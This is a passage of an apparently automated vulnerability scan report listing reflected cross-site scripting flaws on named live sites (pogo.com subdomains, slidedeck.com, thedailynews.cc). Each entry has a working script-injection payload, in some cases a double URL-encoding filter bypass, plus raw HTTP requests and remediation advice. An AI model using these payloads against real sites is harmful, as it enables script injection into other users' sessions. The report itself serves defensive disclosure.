The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:00:19 GMT Server: Apache-Coyote/1.1 Content-Length: 20634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... 8%253c%252fscript%253e s.referrer="http://www s.eVar2="pogo"; s.pageName="Boys & Girls Clubs of America"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_free_home s.prop7="POGO:pogo ...[SNIP]... |
3.614. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [pageSection parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c915%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:59:52 GMT Server: Apache-Coyote/1.1 Content-Length: 20636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... source,'o',pageName); } s.eVar5="fp_mtx_mb_minis s.referrer="http://www s.eVar2="pogo"; s.pageName="Boys & Girls Clubs of America"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_free_home ...[SNIP]... |
3.615. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [pageSection parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /hotdeploy/us/promotions |
Issue detail
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ff%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /hotdeploy/us/promotions Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:59:38 GMT Server: Apache-Coyote/1.1 Content-Length: 21628 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Co ...[SNIP]... ') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo iPhone Landing Page"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_homnav ...[SNIP]... |
3.616. http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15d82"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 03:03:45 GMT Server: Apache-Coyote/1.1 Content-Length: 25638 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.617. http://www.pogo.com/prize/prize.do [pageSection parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b79d%253c%252fscriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:55:58 GMT Server: Apache-Coyote/1.1 Content-Length: 25778 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... op6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Prize Page"; s.prop2="pogo"; s.channel="prizes"; s.eVar18="un_footer ...[SNIP]... |
3.618. http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /sitemap |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b56"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap?a9b56"><script>alert(1)< Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:58:43 GMT Server: Apache-Coyote/1.1 Content-Length: 56808 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.pogo.com ...[SNIP]... |
3.619. https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /action/pogo/signin.do |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ac9"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action/pogo/signin.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:45:11 GMT Server: Apache-Coyote/1.1 Content-Length: 26265 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="https://www.pogo ...[SNIP]... |
3.620. http://www.slidedeck.com/download [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | /download |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71eb8--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.Request
GET /download71eb8--><script>alert(1)< Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:10:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:10:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28374 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com ...[SNIP]... |
3.621. http://www.slidedeck.com/usage-documentation [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | /usage-documentation |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5bb51--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.Request
GET /usage-documentation5bb51--><script>alert(1)< Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28407 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/usage ...[SNIP]... |
3.622. http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.thedailynews |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39c5"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a39c5"><script>alert(1)< Host: www.thedailynews.cc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:20:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 08 Jan 2011 01:20:42 GMT Set-Cookie: UID=15824304; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSASAASQB Cache-control: private <!-- Begin: 1/8/2011 8:20:42 PM --><html> <head> <META HTTP-EQUIV="Expires" CONTENT="0"> <META NAME="GENERATOR" Content=" 1up! Software ( www.going1up.com ) News Site Software 5.5"> <META NA ...[SNIP]... <form method="post" action="index.asp?a39c5"><script>alert(1)< ...[SNIP]... |
3.623. http://board-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e300f</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=ADCD5D39271 Content-Language: en-US Set-Cookie: com.pogo.unid=660623 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache-Coyote/1.1 Content-Length: 106176 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - board"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8= ...[SNIP]... |
3.624. http://board-games.pogo.com/games/monopoly [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/monopoly |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bb8</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=62C5412862A Content-Language: en-US Set-Cookie: com.pogo.unid=660653 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache-Coyote/1.1 Content-Length: 60425 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="monopoly Game Brick Unauth Landing"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games:: s.prop8="Non Authenti ...[SNIP]... |
3.625. http://board-games.pogo.com/games/online-chess [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/online-chess |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9be</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=3F5CAF26C5C Content-Language: en-US Set-Cookie: com.pogo.unid=660653 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache-Coyote/1.1 Content-Length: 54590 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="chess2 Game Brick Unauth Landing"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games:: s.prop8="Non Authenticate ...[SNIP]... |
3.626. http://board-games.pogo.com/games/risk [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/risk |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90c</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=60873238348 Content-Language: en-US Set-Cookie: com.pogo.unid=660662 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:08:33 GMT Server: Apache-Coyote/1.1 Content-Length: 57712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="risk Game Brick Unauth Landing"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games:: s.prop8="Non Authenticated"; ...[SNIP]... |
3.627. http://card-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ce5</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=C0CA04025C7 Content-Language: en-US Set-Cookie: com.pogo.unid=660630 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:56 GMT Server: Apache-Coyote/1.1 Content-Length: 105594 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - card"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8="N ...[SNIP]... |
3.628. http://card-games.pogo.com/games/rainy-day-spider-solitaire [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/rainy-day-spider |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48660</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/rainy-day-spider Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=B38986C5BF9 Content-Language: en-US Set-Cookie: com.pogo.unid=660623 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:51 GMT Server: Apache-Coyote/1.1 Content-Length: 60013 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="spider Game Brick Unauth Landing"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games:: s.prop8="Non Authenticate ...[SNIP]... |
3.629. http://clubpogo-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://clubpogo-games |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2d1</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=EEBFB80E00A Content-Language: en-US Set-Cookie: com.pogo.unid=660641 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:07:32 GMT Server: Apache-Coyote/1.1 Content-Length: 104828 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - club"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop8="N ...[SNIP]... |
3.630. http://flash-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://flash-games.pogo |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42e11</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=5DC8AABF8E2 Content-Language: en-US Set-Cookie: com.pogo.unid=660649 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:14:45 GMT Server: Apache-Coyote/1.1 Content-Length: 23845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Arcade Home"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:: s.prop8="Non Authenticated"; if (typeof(omniture_java ...[SNIP]... |
3.631. http://game3.pogo.com/error/java-problem.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /error/java-problem.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24687</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
